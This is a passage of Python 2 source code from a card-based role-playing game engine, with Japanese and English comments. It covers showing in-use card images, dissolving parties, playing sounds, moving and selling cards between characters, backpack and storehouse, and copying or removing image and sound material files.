self._show_allselectedcards = show_allselectedcards
# Always use the arrow cursor while over a status button
if bool(sbarbtn1) != bool(sbarbtn2):
self.change_cursor(self.cursor, force=True)
def set_inusecardimg(self, owner, header, status="normal", center=False, alpha=255, fore=False):
"""PlayerCardの前に使用中カードの画像を表示。"""
if center or (not owner.inusecardimg and self.background.rect.colliderect(owner.rect) and owner.status <> "hidden"):
inusecard = cw.sprite.background.InuseCardImage(owner, header, status, center, alpha=alpha, fore=fore)
owner.inusecardimg = inusecard
self.inusecards.append(inusecard)
return owner.inusecardimg
def clear_inusecardimg(self, user=None):
"""PlayerCardの前の使用中カードの画像を削除。"""
self._show_allselectedcards = False
if user:
if user.inusecardimg:
user.inusecardimg.group.remove(user.inusecardimg)
self.inusecards.remove(user.inusecardimg)
self.add_lazydraw(user.inusecardimg.rect)
user.inusecardimg = None
else:
for card in self.get_pcards():
card.inusecardimg = None
for card in self.get_mcards():
card.inusecardimg = None
for card in self.inusecards:
card.group.remove(card)
self.add_lazydraw(card.rect)
self.inusecards = []
def clear_inusecardimgfromheader(self, header):
"""表示中の使用中カードの中にheaderのものが
含まれていた場合は削除。
"""
for card in list(self.inusecards):
if card.header == header:
if card.user:
self.clear_inusecardimg(card.user)
if card.user.status != "hidden":
cw.animation.animate_sprite(card.user, "hide")
cw.animation.animate_sprite(card.user, "deal")
else:
card.group.remove(card)
self.inusecards.remove(card)
self.add_lazydraw(card.rect)
def set_guardcardimg(self, owner, header):
"""PlayerCardの前に回避・抵抗ボーナスカードの画像を表示。"""
if not self.get_guardcardimg() and self.background.rect.colliderect(owner.rect) and owner.status <> "hidden":
card = cw.sprite.background.InuseCardImage(owner, header, status="normal", center=False)
self.guardcards.append(card)
def clear_guardcardimg(self):
"""PlayerCardの前の回避・抵抗ボーナスカードの画像を削除。"""
for card in self.guardcards:
card.group.remove(card)
self.guardcards = []
def set_targetarrow(self, targets):
"""targets(PlayerCard, MenuCard, CastCard)の前に
対象選択の指矢印の画像を表示。
"""
if not self.cardgrp.get_sprites_from_layer(cw.LAYER_TARGET_ARROW):
if not isinstance(targets, (list, tuple)):
if targets.status != "hidden":
cw.sprite.background.TargetArrow(targets)
else:
for target in targets:
if target.status != "hidden":
cw.sprite.background.TargetArrow(target)
def clear_targetarrow(self):
"""対象選択の指矢印の画像を削除。"""
self.cardgrp.remove_sprites_of_layer(cw.LAYER_TARGET_ARROW)
def update_selectablelist(self):
"""状況に応じて矢印キーで選択対象となる
カードのリストを更新する。"""
if self.is_pcardsselectable:
if self.is_debugmode() and not self.selectedheader:
self.list = self.get_pcards()
else:
self.list = self.get_pcards("unreversed")
elif self.is_mcardsselectable:
self.list = self.get_mcards("visible")
else:
self.list = []
self.index = -1
def set_curtain(self, target="Both", curtain_all=False):
"""Curtainスプライトをセットする。"""
if not self.is_curtained():
self.is_pcardsselectable = target in ("Both", "Party")
self.is_mcardsselectable = not self.is_battlestatus() or\
target in ("Both", "Enemy")
self.update_selectablelist()
# Curtain over the cards
if not self.is_pcardsselectable:
cards = self.get_pcards()
for card in cards:
cw.sprite.background.Curtain(card, self.cardgrp)
if not self.is_mcardsselectable:
cards = self.get_mcards("visible")
for card in cards:
cw.sprite.background.Curtain(card, self.cardgrp)
# Curtain over the background
self.background.set_curtain(curtain_all=curtain_all)
self._curtained = True
self.draw()
def clear_curtain(self):
"""Curtainスプライトを解除する。"""
if self.is_curtained():
self.background.clear_curtain()
self.cardgrp.remove(self.curtains)
self.curtains = []
self._curtained = False
self.is_pcardsselectable = self.ydata and self.ydata.party
self.is_mcardsselectable = True
self.draw()
def cancel_cardcontrol(self):
"""カードの移動や使用の対象選択をキャンセルする。"""
if self.is_curtained():
self.play_sound("click", )
if self.areaid in cw.AREAS_TRADE:
# カード移動選択エリアだったら、事前に開いていたダイアログを開く
self.selectedheader = None
self.call_predlg()
else:
# Otherwise clear the special area
self.clear_specialarea(redraw=False)
def is_lockmenucards(self, sprite):
"""メニューカードをクリック出来ない状態か。"""
if isinstance(sprite, (cw.sprite.statusbar.StatusBarButton, cw.sprite.animationcell.AnimationCell)) and\
sprite.selectable_on_event:
return False
return self.lock_menucards or\
self.is_showingdlg() or\
pygame.event.peek(pygame.locals.USEREVENT) or\
self.is_showingbacklog()
#-------------------------------------------------------------------------------
# Gameplay methods
#-------------------------------------------------------------------------------
def elapse_time(self, playeronly=False, fromevent=False):
"""時間経過。"""
cw.cwpy.advlog.start_timeelapse()
ccards = self.get_pcards("unreversed")
if not playeronly:
ccards.extend(self.get_ecards("unreversed"))
ccards.extend(self.get_fcards())
try:
for ccard in ccards:
try:
if fromevent:
if cw.cwpy.event.has_selectedmember():
selmember = cw.cwpy.event.get_selectedmember()
cw.cwpy.event.set_selectedmember(None)
else:
selmember = None
selcard = cw.cwpy.event.get_selectedcard()
cw.cwpy.event.set_selectedcard(cw.cwpy.event.get_inusecard())
ccard.set_timeelapse(fromevent=fromevent)
if fromevent:
cw.cwpy.event.set_selectedmember(selmember)
cw.cwpy.event.set_selectedcard(selcard)
except cw.event.EffectBreakError:
if fromevent:
raise
else:
# When time elapses outside a time-elapse content, keep
# processing the remaining characters even if an effect
# is interrupted
pass
finally:
self._elapse_time = False
def interrupt_adventure(self):
"""冒険の中断。宿画面に遷移する。"""
if self.status == "Scenario":
self.sdata.update_log()
for music in self.music:
music.stop()
cw.util.remove(cw.util.join_paths(cw.tempdir, u"ScenarioLog"))
self.ydata.load_party(None)
if self.areaid < 0:
self.areaid, _data = self.pre_areaids[0]
self.set_yado()
def load_party(self, header=None, chgarea=True, newparty=False, loadsprites=True):
"""パーティデータをロードする。
header: PartyHeader。指定しない場合はパーティデータを空にする。
"""
self.ydata.load_party(header)
if chgarea:
if header:
areaid = 2
else:
areaid = 1
self.change_area(areaid, bginhrt=False, resume=True)
elif newparty:
self.cardgrp.remove(self.pcards)
self.pcards = []
if loadsprites:
for i, e in enumerate(self.ydata.party.members):
pos_noscale = (9 + 95 * i + 9 * i, 285)
pcard = cw.sprite.card.PlayerCard(e, pos_noscale=pos_noscale, index=i)
self.show_party()
else:
self.cardgrp.remove(self.pcards)
self.pcards = []
if loadsprites and self.ydata.party:
e = self.ydata.party.members[0]
pcardsnum = len(self.ydata.party.members) - 1
pos_noscale = (9 + 95 * pcardsnum + 9 * pcardsnum, 285)
pcard = cw.sprite.card.PlayerCard(e, pos_noscale=pos_noscale, index=pcardsnum)
pcard.set_pos_noscale(pos_noscale)
cw.animation.animate_sprite(pcard, "deal")
self.is_pcardsselectable = self.ydata and self.ydata.party
def dissolve_party(self, pcard=None, cleararea=True):
"""現在選択中のパーティからpcardを削除する。
pcardがない場合はパーティ全体を解散する。
"""
breakuparea = (self.areaid == cw.AREA_BREAKUP)
if pcard:
if not breakuparea:
return
self.play_sound("page")
pcard.remove_numbercoupon()
pcards = self.get_pcards()
index = pcards.index(pcard)
arrows = self.topgrp.sprites()
sprites = [pcard]
if index < len(arrows):
sprites.append(arrows[index])
elif 0 < index and index == len(arrows):
sprites.append(arrows[-1])
cw.animation.animate_sprites(sprites, "delete")
if breakuparea and pcards:
self.create_poschangearrow()
pcard.data.write_xml()
self.ydata.add_standbys(pcard.data.fpath)
if not self.get_pcards():
self.dissolve_party()
else:
pcards = self.get_pcards()
seq = list(pcards)
if breakuparea:
seq.extend(self.topgrp.sprites())
cw.animation.animate_sprites(seq, "hide")
if breakuparea:
self.topgrp.empty()
for pcard in pcards:
pcard.remove_numbercoupon()
self.cardgrp.remove(pcard)
pcard.data.write_xml()
self.pcards = []
p_money = int(self.ydata.party.data.find("Property/Money").text)
p_members = [member.fpath for member in self.ydata.party.members]
p_backpack = self.ydata.party.backpack[:]
p_backpack.reverse()
for header in p_backpack:
self.trade("STOREHOUSE", header=header, from_event=True, sort=False)
self.ydata.sort_storehouse()
self.ydata.deletedpaths.add(os.path.dirname(self.ydata.party.data.fpath))
self.ydata.party.members = []
self.ydata.load_party(None)
self.ydata.environment.edit("Property/NowSelectingParty", "")
self.ydata.set_money(p_money)
for path in reversed(p_members):
self.ydata.add_standbys(path, sort=False)
self.ydata.sort_standbys()
if breakuparea:
self._save_partyrecord()
if cleararea:
self.pre_areaids[-1] = (1, None)
self.clear_specialarea()
def get_partyrecord(self):
"""現在のパーティ情報の記録を生成して返す。"""
assert bool(self.ydata.party)
class StoredParty(object):
def __init__(self, party):
self.fpath = ""
self.name = party.name
self.money = party.money
self.members = party.members[:]
self.backpack = party.backpack[:]
self.is_suspendlevelup = party.is_suspendlevelup
cw.util.sort_by_attr(self.backpack, "order")
return StoredParty(self.ydata.party)
def _store_partyrecord(self):
"""解散操作前にパーティ情報を記録する。"""
self._stored_partyrecord = self.get_partyrecord()
def _save_partyrecord(self):
"""解散時にパーティ情報をファイルへ記録する。"""
if not self._stored_partyrecord:
return
if not self.setting.autosave_partyrecord:
return
if self.setting.overwrite_partyrecord:
self.ydata.replace_partyrecord(self._stored_partyrecord)
else:
self.ydata.add_partyrecord(self._stored_partyrecord)
def save_partyrecord(self):
"""現在のパーティ情報を記録する。"""
if not self.setting.autosave_partyrecord:
return
if not (self.ydata and self.ydata.party):
return
partyrecord = self.get_partyrecord()
if self.setting.overwrite_partyrecord:
self.ydata.replace_partyrecord(partyrecord)
else:
self.ydata.add_partyrecord(partyrecord)
def play_sound(self, name, from_scenario=False, subvolume=100, loopcount=1, channel=0, fade=0, material_override=False):
if channel < 0 or cw.bassplayer.MAX_SOUND_CHANNELS <= channel:
return
if self != threading.currentThread():
self.exec_func(self.play_sound, name, from_scenario, subvolume, loopcount, channel, fade)
return
if material_override:
# Let the scenario override a skin-bundled sound effect
sound = self.sounds[name]
path = os.path.basename(sound.get_path())
path = os.path.splitext(path)[0]
path = cw.util.join_paths(self.sdata.scedir, path)
path = os.path.basename(cw.util.find_resource(path, cw.M_SND))
inusecard = self.event.get_inusecard()
if self._play_sound_with(path, from_scenario, inusecard=inusecard, subvolume=subvolume, loopcount=loopcount, channel=channel, fade=fade):
return
self.sounds[name].copy().play(from_scenario, subvolume=subvolume, loopcount=loopcount, channel=channel, fade=fade)
def _play_sound_with(self, path, from_scenario, inusecard=None, subvolume=100, loopcount=1, channel=0, fade=0):
if not path:
return False
inusesoundpath = cw.util.get_inusecardmaterialpath(path, cw.M_SND, inusecard)
if os.path.isfile(inusesoundpath):
path = inusesoundpath
else:
path = cw.util.get_materialpath(path, cw.M_SND, system=self.areaid < 0)
if os.path.isfile(path):
cw.util.load_sound(path).play(from_scenario, subvolume=subvolume, loopcount=loopcount, channel=channel, fade=fade)
return True
return False
def play_sound_with(self, path, inusecard=None, subvolume=100, loopcount=1, channel=0, fade=0):
"""効果音を再生する。
シナリオ効果音・スキン効果音を適宜使い分ける。
"""
if not path:
return
if channel < 0 or cw.bassplayer.MAX_SOUND_CHANNELS <= channel:
return
if self._play_sound_with(path, True, inusecard, subvolume=subvolume, loopcount=loopcount, channel=channel, fade=fade):
return
name = cw.util.splitext(os.path.basename(path))[0]
if name in self.skinsounds:
self.skinsounds[name].copy().play(True, subvolume=subvolume, loopcount=loopcount, channel=channel, fade=fade)
def has_sound(self, path):
if not path:
return False
path = cw.util.get_materialpath(path, cw.M_SND, system=self.areaid < 0)
if os.path.isfile(path):
return True
else:
name = cw.util.splitext(os.path.basename(path))[0]
return name in self.skinsounds
#-------------------------------------------------------------------------------
# Data editing and manipulation methods
#-------------------------------------------------------------------------------
def trade(self, targettype, target=None, header=None,\
from_event=False, parentdialog=None, toindex=-1,\
insertorder=-1, sort=True, sound=True, party=None,\
from_getcontent=False, call_predlg=True,\
clearinusecard=True, update_image=True):
"""
Perform a card move operation.
When this method is driven from a Get content,
owner should be None.
"""
# Load the data for the card move operation
if self.selectedheader and not header:
assert self.selectedheader
header = self.selectedheader
if not party:
party = self.ydata.party
if party:
is_playingscenario = party.is_adventuring()
else:
is_playingscenario = self.is_playingscenario()
if header.is_backpackheader() and party:
owner = party.backpack
else:
owner = header.get_owner()
# For backpack <=> storehouse moves,
# only the file needs to be moved
move = (targettype in ("BACKPACK", "STOREHOUSE")) and\
((owner == self.ydata.storehouse) or (party and owner == party.backpack)) and\
(not is_playingscenario)
# Moving a card's position within the storehouse or backpack
toself = (targettype == "BACKPACK" and party and owner == party.backpack) or\
(targettype == "STOREHOUSE" and owner == self.ydata.storehouse)
if not toself and targettype not in ("PAWNSHOP", "TRASHBOX"):
header.do_write()
# Determine the destination
if targettype == "PLAYERCARD":
pass # target was passed in by the caller
elif targettype == "BACKPACK":
target = party.backpack
elif targettype == "STOREHOUSE":
target = self.ydata.storehouse
elif targettype in ("PAWNSHOP", "TRASHBOX"):
# Premium cards cannot be sold or dumped (except when called from an event)
if not self.debug and self.setting.protect_premiercard and\
header.premium == "Premium" and not from_event:
if targettype == "PAWNSHOP":
s = self.msgs["error_sell_premier_card"]
self.call_modaldlg("NOTICE", text=s, parentdialog=parentdialog)
elif targettype == "TRASHBOX":
s = self.msgs["error_dump_premier_card"] % (header.name)
self.call_modaldlg("NOTICE", text=s, parentdialog=parentdialog)
return
# Starred cards cannot be sold or dumped (except when called from an event)
if self.setting.protect_staredcard and header.star and not from_event:
if targettype == "PAWNSHOP":
s = self.msgs["error_sell_stared_card"]
self.call_modaldlg("NOTICE", text=s, parentdialog=parentdialog)
elif targettype == "TRASHBOX":
s = self.msgs["error_dump_stared_card"]
self.call_modaldlg("NOTICE", text=s, parentdialog=parentdialog)
return
if targettype == "PAWNSHOP":
def calc_price(header):
# Compatibility: in 1.30 and earlier a card always sells for half price
if cw.cwpy.sct.lessthan("1.30", header.versionhint):
return header.price / 2
if header.premium == "Normal":
return header.price / 2
else:
return int(header.price * 0.75)
if header.type == "SkillCard":
price = calc_price(header)
elif header.type == "ItemCard":
if header.maxuselimit == 0:
price = calc_price(header)
else:
# If the card has a use limit, the sell price drops as it is used
price = calc_price(header) * header.uselimit
if header.maxuselimit:
price /= header.maxuselimit
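# Worked example (hypothetical values): a Normal-premium item priced 200
# with 2 of 4 uses left sells for 200 / 2 * 2 / 4 = 50 (integer division
# under Python 2).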
elif header.type == "BeastCard":
price = calc_price(header)
if not from_event and self.setting.confirm_dumpcard:
if sound:
cw.cwpy.play_sound("page")
s = cw.cwpy.msgs["confirm_sell"] % (header.name, price)
self.call_modaldlg("YESNO", text=s, parentdialog=parentdialog)
if self.get_yesnoresult() != wx.ID_OK:
return
else:
if not from_event and self.setting.confirm_dumpcard:
if sound:
cw.cwpy.play_sound("page")
s = cw.cwpy.msgs["confirm_dump"] % (header.name)
self.call_modaldlg("YESNO", text=s, parentdialog=parentdialog)
if self.get_yesnoresult() != wx.ID_OK:
return
target = None
else:
cw.cwpy.call_dlg("ERROR", text=u"「%s」は不正なカード移動先です。" % targettype)
return
# Get the index used by the hand-card dialog
if header.type == "SkillCard":
index = 0
elif header.type == "ItemCard":
index = 1
elif header.type == "BeastCard":
index = 2
else:
raise ValueError("CARDPOCKET Index in trade method is incorrect.")
# If the destination is a PlayerCard, check the hand size
if targettype == "PLAYERCARD" and target != owner:
n = len(target.cardpocket[index])
maxn = target.get_cardpocketspace()[index]
# Handle a full hand
if n + 1 > maxn:
if from_event:
# Compatibility: in 1.20 and earlier the card does not go into the backpack even when the hand is full
if not (from_getcontent and cw.cwpy.sdata and cw.cwpy.sct.lessthan("1.20", cw.cwpy.sdata.get_versionhint(frompos=cw.HINT_AREA))):
self.trade("BACKPACK", header=header, from_event=True, sort=sort, party=party,
from_getcontent=from_getcontent)
else:
s = cw.cwpy.msgs["error_hand_be_full"] % target.name
self.call_modaldlg("NOTICE", text=s, parentdialog=parentdialog)
return
# Play a sound
if not from_event:
if targettype == "TRASHBOX":
self.play_sound("dump")
elif targettype == "PAWNSHOP":
self.play_sound("signal")
elif sound:
self.play_sound("page")
# Notify that the inn state has changed
if cw.cwpy.ydata:
cw.cwpy.ydata.changed()
#-----------------------------------------------------------------------
# Remove the data from the source
#-----------------------------------------------------------------------
hold = header.hold
fromplayer = isinstance(owner, cw.character.Player)
if cw.cwpy.event.get_selectedcard() and header.ref_original() == cw.cwpy.event.get_selectedcard().ref_original():
cw.cwpy.event.set_selectedcard(cw.cwpy.event.get_inusecard())
# If the source is a Character
if isinstance(owner, cw.character.Character):
assert not move
# Remove the CardHeader from the source CardHolder
owner.cardpocket[index].remove(header)
# Remove the card's element from the source data
path = "%ss" % header.type
owner.data.remove(path, header.carddata)
# If in battle, also remove the card from the deck
owner.deck.remove(owner, header)
if target != owner and clearinusecard and self.areaid not in cw.AREAS_TRADE:
self.clear_inusecardimgfromheader(header)
# Cancel the planned action if this card is part of it
action = owner.actiondata
if action:
targets, aheader, beasts = action
if aheader and aheader.ref_original() == header.ref_original():
aheader = None
targets = None
beasts2 = []
for targets_b, beast in beasts:
if beast.ref_original() != header.ref_original():
beasts2.append((targets_b, beast))
owner.set_action(targets, aheader, beasts2, True)
# For skills, reset the use count to 0
if header.type == "SkillCard" and owner != target:
header.maxuselimit = 0
header.uselimit = 0
header.carddata.getfind("Property/UseLimit").text = "0"
# Set hold to False
header.hold = False
if not header.type == "BeastCard":
header.carddata.getfind("Property/Hold").text = "False"
header.set_owner(None)
# If the source is the backpack
elif party and owner == party.backpack:
# Remove the CardHeader from the source list
owner.remove(header)
if toself:
# Only the position within the backpack changes
pass
elif header.scenariocard:
# Cards obtained in the scenario can simply be deleted
header.contain_xml(load=targettype not in ("PAWNSHOP", "TRASHBOX"))
else:
if is_playingscenario:
if not header.carddata:
e = cw.data.yadoxml2etree(header.fpath)
header.carddata = e.getroot()
header.flags = cw.data.init_flags(header.carddata, True)
header.steps = cw.data.init_steps(header.carddata, True)
header.variants = cw.data.init_variants(header.carddata, True)
# While playing a scenario, set the deletion flag and defer the
# actual deletion (needed so it can be restored on F9)
if targettype in ("PAWNSHOP", "TRASHBOX"):
# Destination is the pawnshop or trash box: schedule complete deletion
moved = 2
else:
# The card remains somewhere
moved = 1
etree = cw.data.xml2etree(element=header.carddata)
etree.edit("Property", str(moved), "moved")
etree.write_xml()
header.moved = moved
header2 = cw.header.CardHeader(carddata=header.carddata)
header2.fpath = header.fpath
party.backpack_moved.append(header2)
header.fpath = ""
elif move:
# Only the file moves
self.ydata.deletedpaths.add(header.fpath, header.scenariocard)
else:
# While at the inn, just delete it
header.contain_xml()
# If the source is the storehouse
elif owner == self.ydata.storehouse:
# Remove the CardHeader from the source list
owner.remove(header)
if toself:
# Only the position within the storehouse changes
pass
elif move:
# Only the file moves
self.ydata.deletedpaths.add(header.fpath, header.scenariocard)
else:
header.contain_xml()
# No source exists (called from a Get or Lose content)
else:
assert not move
header.contain_xml()
if header == self.selectedheader:
self.clear_inusecardimg()
#-----------------------------------------------------------------------
# ファイル削除
#-----------------------------------------------------------------------
# If the destination is the pawnshop or trash box
if targettype in ("PAWNSHOP", "TRASHBOX"):
assert not move
# For non-attachment summoned-beast cards
if header.type == "BeastCard" and not header.attachment and\
isinstance(owner, cw.character.Character):
if update_image:
owner.update_image()
# If the card was not obtained in the scenario, delete its XML
elif not header.scenariocard and header.moved == 0:
self.remove_xml(header)
if fromplayer and is_playingscenario:
# When dumping a card brought into the scenario by a PC,
# record it so it can be shown in the debug log
# (dumps/moves from the backpack go into backpack_moved,
# so those need no record here)
dcpath = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Party/Deleted" + header.type)
if not os.path.isdir(dcpath):
os.makedirs(dcpath)
dfpath = cw.util.join_paths(dcpath, cw.util.repl_dischar(header.name) + ".xml")
dfpath = cw.util.dupcheck_plus(dfpath, yado=False)
etree = cw.data.xml2etree(element=header.carddata)
etree.write(dfpath)
elif not header.scenariocard and header.moved == 1:
# The card was moved from the backpack to a PC and then removed
assert header.carddata is not None
header.contain_xml()
etree = cw.data.xml2etree(element=header.carddata)
etree.edit("Property", "2", "moved")
header.moved = 2
header.set_owner("BACKPACK")
header.write(party=party)
header.set_owner(None)
self.ydata.party.backpack_moved.append(header)
#-----------------------------------------------------------------------
# Add the data to the destination
#-----------------------------------------------------------------------
# If the destination is a PlayerCard
if targettype == "PLAYERCARD":
assert not move
# Add the CardHeader to the card pocket
header.set_owner(target)
header.set_hold(hold)
# Set the use count
header.get_uselimit()
if from_event and header.type == "SkillCard":
header.uselimit = header.maxuselimit
# Add the card's element
path = "%ss" % header.type
if toindex == -1:
target.cardpocket[index].append(header)
target.data.append(path, header.carddata)
else:
target.cardpocket[index].insert(toindex, header)
target.data.find(path).insert(toindex, header.carddata)
# Up to ~1.1 the DB had no wsnversion column,
# so header.wsnversion may be None
header.wsnversion = header.carddata.getattr(".", "dataVersion", "")
# If in battle, add the card to the deck's hand or draw pile
if cw.cwpy.is_battlestatus():
target.deck.add(target, header, is_replace=toindex != -1)
# If the destination is the backpack
elif targettype == "BACKPACK":
# Add the CardHeader to the destination list
if toindex == -1:
header.order = cw.util.new_order(target, mode=1)
target.insert(0, header)
else:
if insertorder == -1:
header.order = cw.util.new_order(target, mode=1)
else:
header.order = insertorder
target.insert(toindex, header)
header.set_owner("BACKPACK")
if sort:
party.sort_backpack()
# If the destination is the storehouse
elif targettype == "STOREHOUSE":
# Add the CardHeader to the destination list
if toindex == -1:
header.order = cw.util.new_order(target, mode=1)
target.insert(0, header)
else:
if insertorder == -1:
header.order = cw.util.new_order(target, mode=1)
else:
header.order = insertorder
target.insert(toindex, header)
header.set_owner("STOREHOUSE")
if sort:
self.ydata.sort_storehouse()
# If the card was pawned
elif targettype == "PAWNSHOP":
assert not move
# Add the sale price to the party's money or the vault
if party:
self.exec_func(party.set_money, price, blink=True)
else:
self.exec_func(self.ydata.set_money, price, blink=True)
self.exec_func(self.draw)
if targettype in ("BACKPACK", "STOREHOUSE") and not toself:
# Destination is the backpack or the storehouse
if move:
header.write(party, move=True)
header.carddata = None
else:
header.fpath = ""
etree = cw.data.xml2etree(element=header.carddata)
if not from_getcontent:
# Remove the deletion flag
if etree.getint("Property", "moved", 0) != 0:
etree.remove("Property", attrname="moved")
header.moved = 0
header.write(party, from_getcontent=from_getcontent)
header.carddata = None
if header == self.selectedheader:
self.selectedheader = None
if not sort and targettype == "BACKPACK" and cw.cwpy.ydata.party:
cw.cwpy.ydata.party.sorted_backpack_by_order = False
# Reopen the card-selection dialog (unless called from an event)
if not from_event and call_predlg:
self.call_predlg()
def remove_xml(self, target):
"""xmlファイルを削除する。
target: AdventurerHeader, PlayerCard, CardHeader, XMLFilePathを想定。
"""
if isinstance(target, cw.character.Player):
self.ydata.deletedpaths.add(target.data.fpath)
self.remove_materials(target.data.find("Property"))
elif isinstance(target, cw.header.AdventurerHeader):
self.ydata.deletedpaths.add(target.fpath)
data = cw.data.yadoxml2element(target.fpath, "Property")
self.remove_materials(data)
elif isinstance(target, cw.header.CardHeader):
if target.fpath:
self.ydata.deletedpaths.add(target.fpath)
if target.carddata is not None:
data = target.carddata
else:
data = cw.data.yadoxml2element(target.fpath)
self.remove_materials(data)
elif isinstance(target, cw.data.Party):
self.ydata.deletedpaths.add(target.data.fpath)
self.remove_materials(target.data)
elif isinstance(target, (str, unicode)):
if target.endswith(".xml"):
self.ydata.deletedpaths.add(target)
data = cw.data.yadoxml2element(target)
self.remove_materials(data)
def remove_materials(self, data):
"""XMLElementに記されている
素材ファイルを削除予定リストに追加する。
"""
e = data.find("Property/Materials")
if e is not None:
path = cw.util.join_paths(self.yadodir, e.text)
temppath = cw.util.join_paths(self.tempdir, e.text)
if os.path.isdir(path):
self.ydata.deletedpaths.add(path)
if os.path.isdir(temppath):
self.ydata.deletedpaths.add(temppath)
else:
# Compatibility behavior for data from before Property/Materials existed
for e in data.iter():
if e.tag == "ImagePath" and e.text and not cw.binary.image.path_is_code(e.text):
path = cw.util.join_paths(self.yadodir, e.text)
temppath = cw.util.join_paths(self.tempdir, e.text)
if os.path.isfile(path):
self.ydata.deletedpaths.add(path)
if os.path.isfile(temppath):
self.ydata.deletedpaths.add(temppath)
def copy_materials(self, data, dstdir, from_scenario=True, scedir="",
yadodir=None, toyado=None, adventurer=False,
imgpaths=None, importimage=False, can_loaded_scaledimage=False):
"""
Copy the material files referenced by the XML element to dstdir.
from_scenario: if True, copy from the open scenario;
if False, copy from the open inn.
"""
orig_scedir = scedir
if isinstance(data, cw.data.CWPyElementTree):
data = data.getroot()
if imgpaths is None:
imgpaths = {}
r_specialfont = re.compile("#.") # special characters (#)
if data.tag == "Property":
prop = data
else:
prop = data.find("Property")
if toyado:
yadodir2 = toyado
dstdir2 = dstdir.replace(toyado + "/", "", 1)
else:
yadodir2 = self.yadodir
dstdir2 = dstdir.replace(yadodir2 + "/", "", 1)
if adventurer:
mdir = ""
emp = None
else:
emp = prop.find("Materials")
if emp is None:
mdir = ""
e = cw.data.make_element("Materials", dstdir2)
prop.append(e)
else:
if not scedir:
scedir = cw.util.join_yadodir(emp.text)
mdir = emp.text
if mdir in imgpaths:
emp.text = imgpaths[mdir]
else:
emp.text = dstdir2
imgpaths[mdir] = dstdir2
if yadodir and mdir:
from_scenario = True
scedir = cw.util.join_paths(yadodir, mdir)
if not scedir and from_scenario:
scedir = self.sdata.scedir
for e in data.iter():
e.content = None # drop any cached event content
if e.tag == "ImagePath" and importimage:
# ImagePath is needed to display the card without carddata, so embed it
if e.text and not cw.binary.image.path_is_code(e.text):
path = cw.util.join_paths(orig_scedir, e.text)
if os.path.isfile(path):
with open(path, "rb") as f:
imagedata = f.read()
f.close()
e.text = cw.binary.image.data_to_code(imagedata)
elif e.tag in ("ImagePath", "SoundPath", "SoundPath2"):
path = e.text
if path:
if yadodir and mdir:
path = cw.util.relpath(path, mdir)
def set_material(text):
e.text = text
self._copy_material(data, dstdir, from_scenario, scedir, imgpaths, e, path, set_material, yadodir, toyado,
can_loaded_scaledimage=can_loaded_scaledimage)
elif e.tag in ("Play", "Talk"):
path = e.getattr(".", "path", "")
if path:
if yadodir and mdir:
path = cw.util.relpath(path, mdir)
def set_material(text):
e.attrib["path"] = text
self._copy_material(data, dstdir, from_scenario, scedir, imgpaths, e, path, set_material, yadodir, toyado,
can_loaded_scaledimage=can_loaded_scaledimage)
elif e.tag == "Text" and e.text:
for spchar in r_specialfont.findall(e.text):
c = "font_" + spchar[1:]
def set_material(text):
pass
for ext in cw.EXTS_IMG:
self._copy_material(data, dstdir, from_scenario, scedir, imgpaths, e, c + ext, set_material, yadodir, toyado,
can_loaded_scaledimage=can_loaded_scaledimage)
elif e.tag == "Effect":
path = e.getattr(".", "sound", "")
if path:
if yadodir and mdir:
path = cw.util.relpath(path, mdir)
def set_material(text):
e.attrib["sound"] = text
self._copy_material(data, dstdir, from_scenario, scedir, imgpaths, e, path, set_material, yadodir, toyado,
can_loaded_scaledimage=can_loaded_scaledimage)
elif e is not data and e.tag == "BeastCard" and from_scenario:
self.sdata.copy_carddata(e, dstdir, from_scenario, scedir, imgpaths)
def _copy_material(self, data, dstdir, from_scenario, scedir, imgpaths, e, materialpath, set_material, yadodir, toyado,
can_loaded_scaledimage):
pisc = e is not None and e.tag == "ImagePath" and cw.binary.image.path_is_code(materialpath)
if pisc:
imgpath = materialpath
else:
if from_scenario:
if not scedir:
scedir = self.sdata.scedir
imgpath = cw.util.join_paths(cw.tempdir, u"ScenarioLog/TempFile", materialpath)
if not os.path.isfile(imgpath):
imgpath = cw.util.join_paths(scedir, materialpath)
elif yadodir:
imgpath = cw.util.join_paths(yadodir, materialpath)
else:
imgpath = cw.util.join_yadodir(materialpath)
if not yadodir:
imgpath = cw.util.get_materialpathfromskin(imgpath, cw.M_IMG)
# Kirikiri-style audio loop information (.sli)
sli = imgpath + u".sli"
if not os.path.isfile(sli):
sli = None
if not (pisc or os.path.isfile(imgpath)):
return
# Recursively copy images referenced from a Jpy1 file
if from_scenario and cw.util.splitext(imgpath)[1].lower() == ".jpy1":
try:
config = cw.effectbooster.EffectBoosterConfig(imgpath, "init")
for section in config.sections():
jpy1innnerfile = config.get(section, "filename", "")
if not jpy1innnerfile:
continue
dirtype = config.get_int(section, "dirtype", 1)
innerfpath = cw.effectbooster.get_filepath_s(config.path, imgpath, jpy1innnerfile, dirtype)
if not innerfpath.startswith(scedir + "/"):
continue
innerfpath = innerfpath.replace(scedir + "/", "", 1)
def func(text):
pass
self._copy_material(data, dstdir, from_scenario, scedir, imgpaths, None, innerfpath, func, yadodir, toyado,
can_loaded_scaledimage=can_loaded_scaledimage)
except Exception:
cw.util.print_ex()
# Duplicate check: has this imgpath already been processed?
keypath = imgpath
if yadodir:
keypath = cw.util.relpath(keypath, yadodir)
if not pisc and keypath in imgpaths:
# Edit the ElementTree
set_material(imgpaths[keypath])
else:
# Create the copy destination for the image
if pisc:
idata = cw.binary.image.code_to_data(imgpath)
ext = cw.util.get_imageext(idata)
dname = cw.util.repl_dischar(data.gettext("Property/Name", "simage")) + ext
elif from_scenario:
dname = materialpath
else:
dname = os.path.basename(imgpath)
imgdst = cw.util.join_paths(dstdir, dname)
imgdst = cw.util.dupcheck_plus(imgdst, yado=not yadodir)
if not yadodir and imgdst.startswith("Yado"):
imgdst = imgdst.replace(self.yadodir, self.tempdir, 1)
# Copy the image
if not os.path.isdir(os.path.dirname(imgdst)):
os.makedirs(os.path.dirname(imgdst))
if pisc:
imgdst = cw.util.dupcheck_plus(imgdst, False)
with open(imgdst, "wb") as f:
f.write(idata)
f.flush()
f.close()
else:
cw.util.copy_scaledimagepaths(imgpath, imgdst, can_loaded_scaledimage)
if sli:
shutil.copy2(sli, imgdst + u".sli")
# Edit the ElementTree
if yadodir:
materialpath = imgdst.replace(toyado + "/", "", 1)
else:
materialpath = imgdst.replace(self.tempdir + "/", "", 1)
set_material(materialpath)
if not pisc:
# Register it in the dict so it is not processed again
imgpaths[keypath] = materialpath
#-------------------------------------------------------------------------------
# State query methods
#-------------------------------------------------------------------------------
